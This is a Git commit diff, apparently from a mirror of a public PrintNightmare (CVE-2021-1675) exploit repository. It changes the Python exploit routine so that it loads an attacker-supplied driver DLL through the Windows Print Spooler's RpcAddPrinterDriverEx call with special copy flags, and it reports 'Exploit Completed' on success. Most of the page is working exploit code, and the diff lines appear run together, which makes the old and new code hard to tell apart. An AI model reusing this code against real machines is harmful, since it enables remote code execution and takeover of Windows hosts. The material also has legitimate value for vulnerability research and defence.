1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-12-23 11:16:32 +00:00

Remove brute force backup files

This commit is contained in:
citronneur 2021-07-04 09:53:08 +02:00
parent 9938ba9075
commit d6ecf9976e

View file

@ -84,18 +84,14 @@ def main(dce, pDriverPath, share, handle=NULL):
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage0: {0}".format(resp['ErrorCode'])) print("[*] Stage0: {0}".format(resp['ErrorCode']))
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" # Just ask for a new driver with already installed files
for i in range(1, 30): container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
try: flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename)
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
print("[*] Stage1: {0}".format(resp['ErrorCode']))
if (resp['ErrorCode'] == 0): if (resp['ErrorCode'] == 0):
print("[+] Exploit Completed") print("[+] Exploit Completed")
sys.exit()
except Exception as e:
#print(e)
pass
if __name__ == '__main__': if __name__ == '__main__':